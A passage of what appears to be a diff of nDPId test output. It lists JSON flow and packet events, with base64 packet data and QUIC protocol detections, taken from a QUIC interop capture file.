ZQr\/3HZtCstNCtOu3UtW84W17PI7FfcdTn2s7KMsKWIseHKaKkB14DaKKUlr8b+M0Keb3aJipD33LW0ttcYvVI7edW5O9HmyMTEHHmLBoOENtgq1qxmaA8dcVwULmdz7v7A89bnJ9YPWVoQT\/AY3vPa9CPc7aXzzjpQHzXvLmR1Cp8lyfevJQBBugOzD1EFG+6ORqgxwy\/t3AMVq6UiTAqOHk10YiYfoOWp0mc0l792MEYihPH4U0Q4J\/xWCQfYBLc2RwO5JS8\/rBGN\/OkQMwq3X5t9nFOjPPZBRc\/+vV3l78KFWTME722BMgiyt1PB0IMcr\/wY9oB71n3944uqDUTQxh283ZrXbfA6w8v7iNeB1nvtIkfZTo5\/9dY9NpiV9qF4AHCmIy\/ojTRgA9UIdX8hEx5O0FmtvynQ+mLeozICBFeXAnpoY8U5dl0a8wlaBpakWQutMPrk\/nAriiy1jFsR5LnosEI4Yz6\/MFOg7bYZIyHPK\/xf+9zlkY7T4qEj6ycOajZ1TYCeHMIlwhBWcOIPbgRWdOWETBlCd6sWgfOMwJC
AXcjFu88KLuQ+pCjd31kktdw1RVYXCTbQod3cSDHFSoD6z7zQZ32UQ\/kR6M7QstvWKuGXKrevWSqUPnQ7HrYNQDFIBkklqFkxbVZcSnT4UUB7KQmwYtQUc3FO7o6Sx9BRuD68Yg\/gcvk3BApsJtzmbS7xsNHmaRwAqrqaj4+m2ULPGLQS80yS6mffzxUsj35+UHRRyp7PYmh1cC9qTzCEsRA7CjRwHLjqXJ\/bFB2ydqN23sLpT9nS4qU4QS\/HV6Wwrx0WtQFBbsfAW3fUZkAAZCl13hpQUwFlYp1jVMEWAMYBq5YiQtqre2ANV2GA425sm0cmnAEoAPOvqCelpE6WxYBAjJ6Ob9xQn5fw5KtiH1vTt2jIzGqg7h7x+eEG7EtskR3WXy2ULpj8avtEHxoIAYNFuma3Kw1Q5I+yp3gZXvCg80hvQ5yvTMTRFEFLv7e3AI9MWK1ez\/Gs92MjqKDjcFapzN8J0ncdbpf7VMM\/SAAAyn39VVA2B0eImPwbFAkVPm6q7XMvwTw43gkYyH+tIZCaiByTp2fz7f13zt5uWkHJ\/xdDxZ0QWMsgr23LTh8uX0dAi+gTSxGMdGZ+JMlIsaX0oCPfGb0HHLtAsXQYqZ0ZWPw28mWBYTpruOoNFb3DlX+6qExjK8WSy1ooe5+wJKkueb4Xmv\/UjHpZRrauceITr70pDmM\/h\/qmPnCS6hmsP17czX\/4rm35DUjFnD5mDlo+Qvw14FGc0FaI4S4lHwDgjoDtx1uxn3T6ZBIvh7IG+k1Jkwrdejn5+rYQQ7D+n0F6ra8Kary+Yp6IxTLgWMA39l4flYecvLvLbyaihe+bxuZ\/sXW44m\/I+rkIqDYksSpmtNCQoAiuTEaO8+G9TYcOPSiueZiWcspgw=="} -01004{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434743,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":48644,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"pandora.cm.in.tum.de","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+01004{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434743,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":48644,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"pandora.cm.in.tum.de","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434743,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":42468,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1603816434743,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434743,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAP7ZAAEAR7R\/AqAGAilu8k6XkEVEE7HdHzAoKCgoIR0aH1pvahxkAAETSPnSjK947ByD+BwPD1aG8hiXIT+yh1\/\/dJPToYueaTYmcm5W39inFapwMfwXtPNuHyuKzvQi4tEhoFP7o5cr7L\/YLfOvRTXCcf\/nBs2i0GOysW2g+q+ySQiTJnXYhgdgzrVd+5t3w\/PQw6fy9t\/m\/yds5zVgFZvkcK9+PBnMGkX69jNHZy\/lqJ01nDFjal9f8GD69jzEKMTGYvMSJQA7RNeC\/KD8eOpHjj9WBygsq6CUYIr8fo6US3BfgPq9gd0A0tmwg39CMW8XvWjfxQE42A0qdKexPHBHbO44RrgN1lYWHsF9KHFf0oG1zpJP\/biAOd06E+L4G8kH7VJLNs7ScFYpQk1sjfWbopJV2NDDRk5n\/u159T7mAS9TPir6Mkav0xo3zJWRpgX5F8BCPA+wy2ILkS4PSS1v0MrOJCoimlv1DqJ5OlW084DnCjwz8IJMv\/SKXa7+4NnVr\/\/ESvUHOac9wGGR1zXP9FI\/x3cL3p4u9H6RWhCPW4QyjHaemmC\/gfB\/0E+a4D2sYjszc275uEiiMk9YkT5MYHrBeYLCaU7Q8DxDwccUne3cpoJ4lHHcYLSLAlSL\/\/KY7h+VxvR+zoxuGflSDjAs1poqdo\/IUube0PEi4UTgbHuGAtXxbtiHSdrpAoua4+6szPVBhRGKex4yMRpVhbH8S+dN3Pyg3B24A0\/OVSzrM5pnJd27z5j0Gd+CA6I3BX8Yp+2hPRnK41jUW3bVktO7edHptm5sFjlFYICv0SOarAbQ6n2DmwLm92sqQh3QS9Lmm4WOx2XCagFIPZIDiZeLTTkq+aszsag6ixBzFj1pcSsByUB\/GhjosZxT0Gj4yUoAQIHzUTJg7J3nKc68zoJAksRF0IX4lzCTP2m7zWWuJzrV47gUbv+qb40KFRAbhbw5Dyw8fAJ3D9TlnxYIcqnqk4LMimkerR+VyVCXS\/6WHTRMPm4MtIHNddK1\/U\/48s6JsJR68VJBGumfircAqWj50LwIeATognNP1DIA70mG9JvdMDmO2oTwy6ySJN4Y3y06X7q3Z8NCtiC\/iI2uhGloDLFxuymBLemWj0VpyeCZG0yIpqIc1HEmv6XKNmjw7z8uZ8Y5Cfh3l0rF5wkKZKiS1xmPWaos69hnGAavOUwNzlyVD3k8VynbijwHzavIsoRY3BLDI4EUCUOPCvrOJTxW67HBmCCikO43iO+akkrn7xaV4Xo\/zs2kx7KWcSSCAiFYi2fQxAO4dtBo2lzxCU5sDKZWyE2j\/3FtfwJAdNdp2IztD++HqzRoQ387gULsMy0sNutEk1+pbY\/0fe+lCMT8UDYTOJkXwNxjYJql09DmDSST+acm9N1pvUw5rNb4b3q6LcSzpLxBR68KiN6n1WdGdEBNNLh4GVDxkIJvPtKALCuwiML8mF7tHe9HaxwxTrg\/pGssCVS5xDRj73Jovu\/IOG05VG5UNPKU18Acro3NlKckFYERDjRmsoE81UwYtkwm7N7d2F1WbV
oupTw027C7AT7qM8FKZYTL16DfcvuloswPjS71+3GJDR59F44OqreAhoGhdcp+Xh8QSIYeTsyxnGWk0kqW4A4ueD9T9D7LMkceoPCCE+H9fBRiJlRLBVUKyk4ZJsKg4xzaX\/xksDV8yz35z5z93CJ\/IWw=="} -01022{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434743,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":42468,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"quic.westus.cloudapp.azure.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01022{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434743,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":42468,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": 
{"client_requested_server_name":"quic.westus.cloudapp.azure.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1603816434745,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434745,"pkt":"pJGxgjQ5PKn0qB\/sht1gBnpkBNgRQCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRU25URUQTY3a\/ICgoKCgj9UoceU8iiQAAARL6ASJxduLYM4xsAvBTFbnnnMgyZmTRslgR5MTLzlGRvRpNyp8S8YSqhWi2EmIsbwpUo7wbHPWhyFPr99JEnZIlhcjYPyxEGseCwFKnV2A0\/LB+svcKwvaZro6Z2b6a5Qb2NXM0oceBQSsPvPMg08kktxPj6SOee45akgVhY4DzKTwOEuk83sHBjlwEQifFccsbM9rqqjEuAyt6JNZnZPoxNz1G+S71LAyfhU0K8u707IjCNbt043hVKiDAAP5Ls\/kOK5\/P5wqDCSLczv4J+lN2F6A33FYO\/MH2HOQiHb42Npm0EKTL+3SUNLPF87XHIdatFGKqcZkjBNCnSSbcZX2rEd6EUtj2nyhPr+r+nFeDhikrv+PxIFsc4VtD7WW0xDr26dPr5aSb061H45m8ZE0qNRBQR5tFZnbTGbyvde2q0Qpki81IBl6UJt1pUmavS5bxq5HrjSyr+NuMKr1axIeHUWwVKneV0bHR+2mJcQo9V+yDL+oVm6ynfkdvz+nfkBGIwjGTvIVMQdFq8yx2LVqO\/qhKk6WPhCoWu9SDfjAy3GRJgBH2n4\/AbuSFWy2FX3xB+FF8PVmqqU3lrXAwclcYyJxho6IWefEErywTT+xmJJToC+y\/V9RX\/POWQWAr70juowrxsRoO0Y3cHtF1mRnK77ko\/Z2bo+32+o7WcpTcj05oFRjeFzF\/bQhzfov7nC9AvF49NZTgKdU080+rsO\/a47JDDU9xRZIAdg7wur3suP\/23X5uAgAdvy9UfsMqaYaHuALSqzHmgmG+LU\/6oOzEiGUuM8xxO480fAsxJEYsa6aGv2IZSIrscvxw7PTjaAwUenIyoO3VqZ+CINAlZcJTfYDfC9Hoc9OdcdGsqCYKUW2wEzwexc9d2EUKPuBdQN2dXat5aWucUNWLDcCZgqT4lbJEnTA2hr0ad5eSaqS6BfcqZWuOLYKUHB67L8Lmnq2zuNtqKmvXXpYPuIvpGFWs7G7GD6CQFOGRklyTm3tEhq+17muIZPvSti1DEepk\/jf609KGeKiujNRiayZCXOCYOzkT28aBRRNckMsvT0LKNcigIKfjCDjIrh9aBkhLcgwpdGyl0y0h5hzDf\/4VXIhtMY0ORmfK1bAFgAlZBgLLfAp9\/vELXdZmlDRSB768DANFA4iwCGp8+E5loZtSnwVUJwBA4KRJzszszKovh\/eLZuleX\/lWlVGnatUN4nwRXaA1HElTOEdLlw6fZcHl\/Bdp4mHTJ8y+9+pA69KKpbmT
ruDVoXYkxoxHu9SNP1A3\/1SU74fa+4vsnpiYx3onvBAsr5gEzR0pL43F78fgO+m6gor7Et7VdeE4b0ZBmKRybKRoGjfTeCumdBa1nXpC30UmUVAo+zHRyQ1fZ2xkGMwXeR8l2HdsJlr15wXYvnfd6lL7qDoJjy440fHRTo9Bsr\/clAcx+A\/nz+C5jTYcda4m99NqYRLQUmM0ojNMm3OJF4cbzbp6ia5SamPyogQ1msqIhDfkv9Q2tHko55jTHfOK86Fc81Rz9PlrSPeKqSQiDiYO0Ad6xLICN\/o4TcHWtv1wNgnzDEw5LNMuaUGnl4D4FXXeGTZ793MSG1gIEgmaX3GvG52P40BhE04PqAmddEQ=="} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1603816434749,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1603816434749,"pkt":"PKn0qB\/spJGxgjQ5ht1gCsonACMRMSABGfAABQwhVAAB\/\/4zO5YgAQsHCsnVrqTT\/kdpHoB9EVGzHAAjCaG2AAAAAAAI2i99jGY\/xbL\/AAAd\/wAAHP8AABs="} 02152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1603816434750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434750,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA8Y1AAEAREMTAqAGAR8opqZMdEVEE7OQ\/wwoKCgoIqaWx\/UJ+JLQAAETSC8vS9NYx\/piHxwl8s8tPMp6kRvO2UBaRMuZHcUr7jludPMV53ZjKHSEyJP+9E8\/YwfQgCjydB0456RwGo1\/cbqx+RH1Q8+a1Bo1DdJBYSWHzgdWM0CbI8YB14t04OHAilhwb5MlDY0NSInVq7T8MAzGcexUB7xgxT3QdMV0ajcdAA4QbbUxGpL\/JsbBCdpMKcKPK2DVQFnN0kkOHn9OlQg4o9cA4XLljFnTIscrDUPaU8cEzYClT6gYQP2jfUUOYkMZZULYk5bpXO7ax5xa50czA2ls0cdXBQf7YUbq+XEnU8cGtnVcx69nAz\/CACNjhFN4oROsXXKDcRVVrHQlIHQT9PZ1APNWYKwMR9C2+9u8dIrhct2cOe+7nRU5qzDx+30cas94Oc2UBgVvL4WrIGpSaoUpJWOS0GeDoGOZ\/NWWg33pgJHnq+fY7ZzZHaHkXZjK77y1bAHB5Tr17hCnN5b0yRFsFoYe9i3Wjp9k8hE3VZmn0SbrwA2HbX31Rwes9jjmIw\/os2DIcecacn2FrvDVlDqA+PQeIAXs\/2y71axQ4RLDic1gPyOF1NF3TOt80pLqz6lBzfCDO3rQH87n\/FiG2UQCjXUWyj00vQBE0K4S49nr
AnDyF86E+RmqfHyjAEU7mfiLFjvU+SSLwbi\/fJZjzvnUDZSqjvi6f0IiNao51VPDI0VABW13IqPcImOawEl8JX5u0SQuxZjMaB+gkN47AMk5gGVpUcxeJ7Z9XwIs0K0lZDbqGWCXMCdIud52cUv5Q7a4BkzKCwhQfbEBvI2t+x0ewDQFUYQ17Lne1\/93MxOPU47Wf8TBSnv+VQbWOxLdCg2nECwvv8CsEtJFeZWh\/ha1cf4fZct1vISvq8GJAxKd76jGaP\/45zQLjR4HASo2rVXFn0L\/ETUkSvIfvqvSOkP0YtSO\/ZLn52LtlBuvcA71G0tQ37DmpzKxqMVV6sHgX3+zStA9c6eE7Wp\/gkgIS2yyC89rXKte79UGlVKqDYHmP54LWQ33xn\/ghDB5Udev516Q4LJ\/LYK1naDjh4zdtyWDOyHtV6dDjzohTwANBgk7tTb8qpeFDkvo\/5XKUnTRyFT6z1vDtwXisGZ3PyPwdthxyiwl227D+CWkoTh6C7df5\/ykCgFfvvCvgoQH8u8rshHs55PKOGBg5Hqs5deERSp3QXO5XGtS3KFrfrVEg6HdcbkCxSBW6ksxlYLzTFTTuuN3qPrqUBpBL+bmMKRSiOP1Qzjapvnxaf9gMa1yPSmZaOdEDbYJpPK7oha37il+Yc\/Ki35zS\/SKKrO9P2OR76tBQ1tVYddL33Ezyaaiyq3JlG\/nwWmfV5D2y+Js0\/lW0oPF+SLaGcNUfweLLinRJd+WusXgPVh9RJ+wX\/ykCIdqWlM284dJEMxAAj6BoI4wNZMRXYMh7U0nrCrpYSTFx7EaqFBm7HBPZbeFEUO8nxhWclcKvpJfe5Sf5yDohJz\/1ozHUKuzC9D3+QBJjDqURTWaAew7pm4H1KncN+qU8PnTQKXvs8sV4kCe3iQ+i0\/nVCMUjviEYY1\/hUg1AA4cxVLMRpwljkJ+SrVfWXClIk9dlebLFDCqTEzVG8u0wwo9BmMF63RqgLA7RedBbfzfYGr0pGXf\/l2NvPGQXqdbLDg=="} 00644{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434750,"flow_last_seen":1603816434750,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434750,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":38689,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1603816434750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434750,"pkt":"pJGxgjQ5PKn0qB\/sht1gAfkDBNgRQCABCwcKydWupNP+R2kegH0gARnwAAUMIVQAAf\/+MzuWlyERUgTYFmvNCgoKCgjw7KzpNo8oeAAARL4tqmRQ5KPAPbdPUnedDn077kKWSLkPygVEwdGpIVFWcp2en9F3ERED+OnUg3d8i8AAkr44lz5aAq3LC+Q212cavhgupcuDcqNoIGhnCIfm+QSZcdNZ4zXfagNI0pLJoRsvOsL\/uXGYxbmgqR94yTDxQ0eUCVIZASIUeRZjEvJCthWVFT2rgBlBR7LYtLcvCmtn0DIMTAiPE\/xh01OGF5bAJQ2pznCPuONfdxbRDf26\/K7Vorl6tUQm\/NY5ROm8iHLzI4aMVUF0HjSu3+YUC1uhFUVddfTvpusRwaZ7kJNAa7P\/Vy96rw+N1QmHoKrViF3SiU98y7yZQbZlWxDFuBm3kfHuLnWeUnH4lwkgdmjgDw\/tGYT9JNO+a4WXT0WG+E149U5CDNgHVyClW14kVzq2L5mwgYWZMAo+lEamoeJB5h9+NMm0nQlLQivIZYDxop0vohOxK5n93lmaDplwC7Jat5ImroXJjGBA1i\/wWMXgstJIth+GejqRDCbbbeG7NxvZ9rVNx+l6f970K8CtZlugC3GRbFE9tMsDJl5zdBgPz83kXeLW4WfxGljbZ2I1\/Fsv5Dj9XTubdhAYt4ThM0knFSb5aX6Ff26rVq4Lfqy9HtKxEerRRn\/GPQ4yjlBfNoPdWIbjRC7TEbcUSnLf\/aCaXXZvuxf7r562GmcMeGxyHBQBVeTMDY1abEs7sWm\/+SOMgorJmIj9ISqcpplInrkBzayKhF83lHHurhCA1lrKNlSdpeepOLCf\/jMxhKTDSGOt6PuvUNMjvuJNj7JdWjB1qgt+7yg6GfadVoLlc7oKEmP2EZkbg1reAwAQOQU0SIVyNqN7R8++hQVFb9WO4t2FPgkjCkOeg8PKyC0+NKn6ths3s033xQ7XDByeP8Nn2kj5mf2ZY2gISmQLZEcrz0CUqG\/ia+5tqLKj4+\/Cndt6cFxpPnK+zzcl+5uVQbgnRXQJmrxZO\/AIu15jMIC2BXo7iG1s9T31lFVuK8ZWVw0cL8LlBKwlz8kc+VhdGPCJrGwt3wYzDhn2EetnDAIMnbnceC6ASm4ceWPn7zfseGSdZHnqg2ItW2chn2XlcQp4yI6MIqqKBep7wjkYIzq1Xg27JeDrqOB5eSz5nPdiU3VaODgQWCUUbg9ghrJZfwLkGvswGRALf+EzPBVkuJnFi0tcoasUB17bL2uvxmMJsQHWFO1QguLm7aeVi4DCA7LeprVfnREJzlwtTcq1k5DYJjUcopXIzceZ1RbGyvZp4+Cg3kMpFGVYKly62GUic6\/xL1lutLalr\/JjiJp45zRjU0jch7XG6sx+An4xZJK0US\/g0Kv\/HVtYynUrwZXu\/woHqvI9+NK8siaNZbHMUKRkIGOXCg9aT\/yvWLUSR9BuvtiEH\/8yVs7NtMMrdgpTQTivJT44BZN6SO0WXldGZUkYPP9OVZchj36EQYpACosyteNK+R\/3v7MWWO4pEsgkp64XBxw2
OWJLRgsbR2Yz5fH7LkIbs0gEHDj7\/gcfuV5kb5ePRim1rmsSUQI+hvJlOF3Hyyb3A9HUl2d7fhX4v+4KZIvtThVaEaIsqv89pcU+EoZuJG6wojlAyR0dhaUyj7ezXTuA25fYN0yKiGFN29BfWA=="} -01037{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434750,"flow_last_seen":1603816434750,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434750,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":38689,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.tech","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01037{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434750,"flow_last_seen":1603816434750,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434750,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":38689,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.tech","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 02148{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1603816434750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434750,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUANsZAAEARy4vAqAGAR8opqZMLAbsE7Ok\/zAoKCgoINqH1Vk80LhQAAETSoI4wdjcpvn01GyYGcs8WSPSlKPT4hY9r7ZqPT9FILv6mf0g+Sw+ruXz256wKfDlVUbQnhrO+J2WPPYXirISnHdW5UejVo+0GNbGGC7pxqEcspy5a\/AJGn9AlGBaUXuFdjU97Kn6GHsNBd6bdZ3+SRnRxnNzx3oqxje3M74CutehdUh9SD+lH8Ub\/n5kiikOxdihmi26CPsVygaeEpmQ\/ctjlgUeWzXeW6BI5VBRC\/SBTjQ1Jm5WM7UYSJc7206JIZFbkts5ijN4IYXYCa6dQPxtIUWKXQ3dvfDY7hKCYqYb0oQk8vNpd+VxLZ+X2tKF+cUI8Vxl+uQ1cyS7KRBFhSWWakuw6JqnPtneYuh2X0FsZcDWbR4iGUWVWgDg9Qw5cfvrP12Y\/yiLSLAGuKBuRr+bvLEH8tSrJRasEnvugWyA7qLDfZYZJnvH+JBBq7\/aECFTncu7StDcd8mUbn9I9AidCbV\/bMYXQlnSnKDQulxvXQ4dbJwT\/tlwiGidqTTeBgir9P1P3PCQxKDec98Req33hD33Pl1kOhW47JhAzt2PSVpD5yGFmdTiUtav0ZVZ4bVttJ50pPh0rwKfk06rey\/iamM+sc2+SMdjSdewqGqL+SInrOte3Zwu6gGMBTDH1Dyn1E0nmn0Tb\/Q1gEjU93vGLNsvKan5nMFqYWW2NNsruGSJ+9aJA9OOwdQMWK3sGUohqhR5oMULjwJwWB4Co1NNGczoGoTZkPBosjx1u8umd4oTn1Z2YEOsfq\/MS16\/Yc6JAedu\/au3dMTV8zUcm9uBg2LvP4HCYefsbA+hZ3OpRlBsm8QE5VwJdjLl9s5rMN33d4LYFMCKrf6QdIGj5c4fUlmgpdRq+dBGaSuAfzg0ku6d1UCGoNDQKc7loJPuEMWGVQQa3mEV9T3wFWWD6qST\/etOV4D\/sj1plYn1+smnFQBuQZSbZweVdNYukikzA14A8nweXxSHltQyCOoXoXsTnOodIRecC5axLme+KFXLONSqcF7oL989dNvADyfgfXeWjM56pSGw8v1frDP2WvRz\/9O2VASdSPymmk7eOvVaojgAkCWc585MWwdlDf2Bq\/0Eu3MuR5eBJAaTZqNMwminLUZSdyoyjLlJm2rZrJBLuK2gyXgKALsphtbmnZoJqw6TqoTKjr8UYtnFpWqENJDhQ5+ORa2Hcbq\/Dt4PwTSt+rPvIoSh7Jaterb+RkztGN0uVdPoKTy77oy3I5g
